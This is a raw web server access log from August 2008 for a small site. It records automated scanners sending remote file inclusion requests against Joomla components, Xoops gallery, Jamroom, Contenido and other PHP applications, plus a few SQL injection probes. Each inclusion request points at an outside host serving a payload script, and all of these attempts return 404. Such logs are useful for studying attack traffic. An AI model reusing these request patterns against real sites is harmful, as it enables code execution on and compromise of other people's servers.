204.73.96.210 - - [15/Aug/2008:18:03:12 -0700] "GET /logs/access_080726.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:04:02 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:04:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:04:02 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.195.37.163 - - [15/Aug/2008:18:04:04 -0700] "GET /logs/access.log HTTP/1.0" 200 27044 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:44 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:45 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:45 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:05:45 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
80.70.113.10 - - [15/Aug/2008:18:06:10 -0700] "GET /logs/access_080719.log///admin/classes/TplLoad.php?full_path_to_public_program=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:06:38 -0700] "GET /logs/access_080726.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
204.73.96.210 - - [15/Aug/2008:18:06:39 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
64.20.53.210 - - [15/Aug/2008:18:06:53 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:25 -0700] "GET /logs/access_080719.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:25 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:26 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:26 -0700] "GET /logs/access_080719.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:26 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
67.18.151.242 - - [15/Aug/2008:18:07:26 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ucclawsociety.com/joomla/modules/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:10:25 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:11:17 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:12:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:14:00 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:14:00 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:23:34 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:23:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:23:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:18:23:37 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:18:23:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:18:23:38 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
74.50.28.200 - - [15/Aug/2008:18:27:32 -0700] "GET /logs/access_080726.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fundejus.org//components/com_login/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:27:34 -0700] "GET /logs/access_080726.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
85.214.88.11 - - [15/Aug/2008:18:31:00 -0700] "GET /errors.php?error=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.getyourselfahorse.com"
85.214.88.11 - - [15/Aug/2008:18:31:00 -0700] "GET /logs/access_080719.log/errors.php?error=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.getyourselfahorse.com"
85.214.88.11 - - [15/Aug/2008:18:31:00 -0700] "GET /logs/errors.php?error=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:31:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:18:31:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:33:24 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:33:25 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:33:25 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
148.243.214.204 - - [15/Aug/2008:18:38:05 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=-1+union+select+0-- HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
148.243.214.204 - - [15/Aug/2008:18:38:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=-1+union+select+0-- HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
148.243.214.204 - - [15/Aug/2008:18:38:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=-1+union+select+0-- HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:40:19 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:40:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:40:20 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:40:54 -0700] "GET /logs/access_080719.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
148.243.214.204 - - [15/Aug/2008:18:41:10 -0700] "GET /logs/access_080726.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=-1+union+select+0-- HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:41:43 -0700] "GET /logs/access_080726.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:41:43 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:41:43 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:46:41 -0700] "GET /logs/access_080726.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:46:42 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:46:42 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:18:50:35 -0700] "GET /logs/access_080726.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:51:12 -0700] "GET /logs/access_080719.log/errors.php?error=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:51:12 -0700] "GET /errors.php?error=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.51.194 - - [15/Aug/2008:18:51:12 -0700] "GET /logs/errors.php?error=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:18:58:20 -0700] "GET /logs/authentication_index.php?PGV_BASE_DIRECTORY=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:18:58:20 -0700] "GET /authentication_index.php?PGV_BASE_DIRECTORY=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:18:59:26 -0700] "GET /authentication_index.php?PGV_BASE_DIRECTORY=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:18:59:26 -0700] "GET /logs/authentication_index.php?PGV_BASE_DIRECTORY=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:19:03:01 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:19:03:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:19:06:43 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:19:06:43 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:19:08:02 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:19:08:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:19:08:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
58.25.217.217 - - [15/Aug/2008:19:10:20 -0700] "GET /logs/access_080726.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
58.25.217.217 - - [15/Aug/2008:19:10:21 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
58.25.217.217 - - [15/Aug/2008:19:10:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
77.221.130.6 - - [15/Aug/2008:19:11:51 -0700] "GET /logs/access_080726.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:19:26:21 -0700] "GET /logs/access.log HTTP/1.0" 200 44913 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
85.214.72.55 - - [15/Aug/2008:19:26:28 -0700] "GET //newspublish/samplenewspublish.php?path[docroot]=http://russianinterpreter.ru/administrator/templates/joomla???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
85.214.72.55 - - [15/Aug/2008:19:26:28 -0700] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://russianinterpreter.ru/administrator/templates/joomla???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
85.214.72.55 - - [15/Aug/2008:19:26:28 -0700] "GET /logs/access.log//newspublish/samplenewspublish.php?path[docroot]=http://russianinterpreter.ru/administrator/templates/joomla???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
203.112.195.19 - - [15/Aug/2008:19:26:30 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
203.112.195.19 - - [15/Aug/2008:19:26:31 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:19:27:52 -0700] "GET /?N=D HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
85.214.72.55 - - [15/Aug/2008:19:29:39 -0700] "GET /logs/access_080726.log//newspublish/samplenewspublish.php?path[docroot]=http://russianinterpreter.ru/administrator/templates/joomla???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:33:44 -0700] "GET /index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:36:47 -0700] "GET /logs/access.log/index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:36:47 -0700] "GET /index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:36:47 -0700] "GET /logs/index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:37:18 -0700] "GET /logs/access_080726.log/index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.89.162 - - [15/Aug/2008:19:41:43 -0700] "GET /index.php?pagina=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
203.112.195.19 - - [15/Aug/2008:19:41:58 -0700] "GET /logs/access_080726.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
203.112.195.19 - - [15/Aug/2008:19:42:01 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
203.112.195.19 - - [15/Aug/2008:19:42:05 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:19:44:31 -0700] "GET /logs/access.log/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:19:44:31 -0700] "GET /index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:19:44:31 -0700] "GET /logs/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:19:45:10 -0700] "GET /logs/access_080726.log/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
210.245.166.92 - - [15/Aug/2008:19:45:11 -0700] "GET //include/write.php?dir=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
